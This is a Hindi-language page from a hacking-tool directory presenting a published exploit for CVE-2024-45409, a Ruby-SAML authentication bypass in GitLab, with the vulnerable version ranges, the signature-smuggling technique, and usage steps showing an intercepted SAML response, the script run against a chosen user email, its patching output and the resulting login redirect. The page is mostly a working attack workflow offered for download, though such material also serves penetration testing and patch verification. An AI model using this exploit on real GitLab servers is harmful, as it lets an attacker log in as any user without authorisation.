Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-45409 — Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit | Kitploit
उपकरण/GitHubGitHub/synacktiv/cve-2024-45409
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubsynacktiv/cve-2024-45409

CVE-2024-45409

Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit

रिपॉजिटरी देखें
84131 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ruby-SAML / GitLab प्रमाणीकरण बाईपास (CVE-2024-45409) शोषण

यह स्क्रिप्ट CVE-2024-45409 का शोषण करती है, जो IDP द्वारा जारी किसी भी हस्ताक्षरित SAML दस्तावेज़ तक पहुँच रखने वाले अप्रमाणित हमलावर को SAML प्रतिसाद/अभिकथन जाली बनाने और GitLab पर किसी भी उपयोगकर्ता के रूप में पहुँच प्राप्त करने की अनुमति देती है।

निम्नलिखित सभी GitLab (CE/EE) संस्करण संवेदनशील हैं:

  • < 16.11.10
  • 17.0.0 < 17.0.8
  • 17.0.0 < 17.1.8
  • 17.0.0 < 17.2.7
  • 17.0.0 < 17.3.3

यह शोषण संशोधित अभिकथन के DigestValue को StatusDetail तत्व में इंजेक्ट करता है, जिससे यह XPath चयनकर्ता को तस्करी करने की अनुमति देता है जो SignedInfo ब्लॉक में मौजूद मान के बजाय इस मान का उपयोग करेगा।

आवश्यकताएँ

  • IDP द्वारा जारी एक वैध SAML प्रतिसाद

उपयोग

root@kitploit:~
apt install python3-lxml

पहले URL और Base64-एन्कोडेड IDP SAML प्रतिसाद को इंटरसेप्ट करें, फिर स्क्रिप्ट का उपयोग करके XML सामग्री को संशोधित करें।

root@kitploit:~
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
root@kitploit:~
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64

उसके बाद, पैरामीटर SAMLResponse मान को स्क्रिप्ट आउटपुट से बदलें। यदि प्रमाणीकरण सफल होता है, तो आप GitLab होमपेज पर रीडायरेक्ट हो जाएंगे।

root@kitploit:~
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>

संदर्भ

  • https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
  • https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
  • https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45409
  • https://www.cvedetails.com/cve/CVE-2024-45409/
टूल डाउनलोड करें